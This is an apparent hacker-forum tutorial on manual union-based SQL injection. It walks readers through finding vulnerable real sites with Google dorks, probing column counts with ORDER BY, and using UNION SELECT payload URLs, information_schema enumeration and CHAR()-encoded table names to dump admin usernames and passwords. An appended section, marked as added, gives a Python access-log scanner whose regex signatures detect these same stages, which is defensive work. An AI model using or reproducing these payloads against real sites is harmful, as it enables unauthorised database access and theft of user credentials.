Union-Based SQL Injection Method | BY MR:47{XYBER SHEIKH}

UNION-BASED SQL INJECTION

I am going to teach you SQL Injection (Union-Based). I will not teach you SQLi with automated SQLi tools, because pro hackers work manually. Tools are for kiddies ^_^ ...!

So lets start!

Step 1: First of all you need to find a site vulnerable to SQLi. You can use Google Dorks (inurl:index.php?id= .. inurl:page.php?id= etc.).

To check whether the site is vulnerable or not, put a ' at the end of the URL.
If the page shows a SQL error, the site is vulnerable.

Step 2: Next, we have to find the number of columns! We will use the ORDER BY method!
Like this :

http://www.site.com/index.php?id=12-- order by 1 (no error)
http://www.site.com/index.php?id=12-- order by 2 (no error)
http://www.site.com/index.php?id=12-- order by 3 (no error)
http://www.site.com/index.php?id=12-- order by 4 (error)

  • This means the site has 3 columns!
Step 3: Now we have to find the most vulnerable column. For this, I'll use the UNION ALL SELECT method! Use as many numbers as the column count you found in Step 2.
Like this:
http://www.site.com/index.php?id=-12 union all select 1,2,3,4--

  • It will show some numbers on the page ... the one shown in bold is the most vulnerable column!
Step 4: Now we have to extract some information ^_^ :3

  • Replace the number of the most vulnerable column with your query, like this ...

http://www.site.com/index.php?id=-12 union all select 1,@@version,3,4--

Here are some MySQL variables and functions for fetching data from the site:
Variable/Function        Output
@@hostname               Current hostname
@@tmpdir                 Temp directory
@@datadir                Data directory
@@version                Version of DB
@@basedir                Base directory
user()                   Current user
database()               Current database
version()                Version
schema()                 Current database
UUID()                   System UUID key
current_user()           Current user
current_user             Current user
system_user()            Current system user
session_user()           Session user
@@GLOBAL.have_symlink    Check if symlink is enabled or disabled
@@GLOBAL.have_ssl        Check if it has SSL or not

Step 5: Next, we have to extract tables...

Like this :-
http://www.site.com/index.php?id=-12 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--

  • These are all the tables in the database.
Step 6: Now we have to extract columns ...

Replace "group_concat(table_name)" with "group_concat(column_name)".
Replace "from information_schema.tables where table_schema=database()--" with
"FROM information_schema.columns WHERE table_name=mysqlchar--"
Now listen carefully: we have to convert the table name to a MySQL CHAR() string and replace mysqlchar with that.

Find MysqlChar() for Tablename:

First of all install the HackBar addon.
Now select SQL -> MySQL -> MySqlChar().
This will open a small window; enter the table name which you found. I am going to use the admin table name.

Click OK. Now you can see CHAR(numbers separated with commas) in the HackBar toolbar.
Copy and paste the code at the end of the URL in place of "mysqlchar".

For example:
http://www.site.com/index.php?id=-2 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.

like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace "group_concat(column_name)" with "group_concat(columnname,0x3a,anothercolumnname)".
columnname should be replaced with one of the listed column names.
anothercolumnname should be replaced with another of the listed column names.

Now replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name", where table_name is the table you found.
For example:

http://www.site.com/index.php?id=-2 and 1=2 union select 1,group_concat(admin_id,0x3a,admin_password),3,4,5,6,7 from admin--


Now it will show the usernames and passwords.
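From the defender's side, the sequence in Steps 2 to 6 leaves a recognisable trail in the web server's access log. The following added example (not part of the original tutorial; the log lines and the 203.0.113.7 / 198.51.100.4 addresses are constructed) scans combined-format log lines for the ORDER BY ramp, UNION SELECT, information_schema and CHAR() patterns, groups the hits per client, and reconstructs from the 200/500 flips the column count the ramp revealed to the attacker.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus
# Constructed access-log lines (not from the page) replaying the tutorial's ORDER BY ramp,
# UNION ALL SELECT with @@version, and information_schema lookup with a CHAR() table name.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:09 +0000] "GET /index.php?id=12--%20order%20by%201 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:12 +0000] "GET /index.php?id=12--%20order%20by%202 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:15 +0000] "GET /index.php?id=12--%20order%20by%203 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:18 +0000] "GET /index.php?id=12--%20order%20by%204 HTTP/1.1" 500 1203
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=-12%20union%20all%20select%201,@@version,3-- HTTP/1.1" 200 5300
203.0.113.7 - - [10/Oct/2023:13:57:30 +0000] "GET /index.php?id=-2%20union%20all%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=CHAR(97,100,109,105,110)-- HTTP/1.1" 200 5400
198.51.100.4 - - [10/Oct/2023:13:58:00 +0000] "GET /index.php?id=12 HTTP/1.1" 200 5120
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
SIGNATURES = {  # patterns matching the probing stages the tutorial walks through
    "order_by_ramp": re.compile(r"order\s+by\s+\d+", re.I),
    "union_select": re.compile(r"union\s+(?:all\s+)?select", re.I),
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "schema_enum": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I),
}

def parse_line(line):
    """Split a combined-format line into (client_ip, decoded_query, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote_plus(m.group(2).partition("?")[2])  # decode only the query string
    return m.group(1), query, int(m.group(3))

def scan_log(text):
    """Group signature hits per client IP; keep (n, status) for every ORDER BY n seen."""
    report = defaultdict(lambda: {"kinds": set(), "order_by": []})
    for line in text.splitlines():
        if (parsed := parse_line(line)) is None:
            continue
        ip, query, status = parsed
        kinds = {name for name, rx in SIGNATURES.items() if rx.search(query)}
        if not kinds:
            continue  # ordinary request, nothing to record
        report[ip]["kinds"] |= kinds
        for n in re.findall(r"order\s+by\s+(\d+)", query, re.I):
            report[ip]["order_by"].append((int(n), status))
    return dict(report)

def inferred_column_count(order_by):
    """Highest ORDER BY index that returned 2xx: the column count the ramp revealed."""
    ok = [n for n, status in order_by if 200 <= status < 300]
    return max(ok) if ok else None
```

A single UNION SELECT hit is already worth an alert; the ORDER BY ramp followed by a 5xx and then a UNION request from the same client is the full reconnaissance sequence and should be escalated.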

Enjoy..